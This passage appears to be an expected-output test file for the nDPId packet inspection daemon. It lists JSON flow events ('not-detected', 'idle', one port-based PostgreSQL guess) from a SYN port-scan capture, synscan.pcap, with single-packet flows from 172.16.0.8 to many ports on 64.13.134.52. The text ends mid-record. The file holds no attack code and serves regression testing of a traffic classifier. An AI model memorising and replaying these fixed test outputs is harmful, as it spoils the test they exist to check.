+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","ndpi": 